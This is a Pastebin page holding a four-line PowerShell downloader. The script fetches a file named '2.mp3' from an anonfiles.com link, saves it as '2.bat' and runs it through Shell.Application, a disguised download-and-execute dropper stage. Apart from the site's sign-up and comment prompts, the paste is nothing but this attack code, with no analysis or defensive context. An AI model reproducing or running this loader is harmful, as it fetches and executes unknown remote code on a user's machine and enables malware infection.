Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $url_file = 'https://cdn-125.anonfiles.com/R1Z5mcCcp1/7ad2b712-1611478166/2.mp3'
- $file = '2.bat'
- PowerShell (New-Object System.net.WebClient).DownloadFile($url_file,$file),
- (New-Object -com Shell.Application).ShellExecute($file);
Add Comment
Please, Sign In to add comment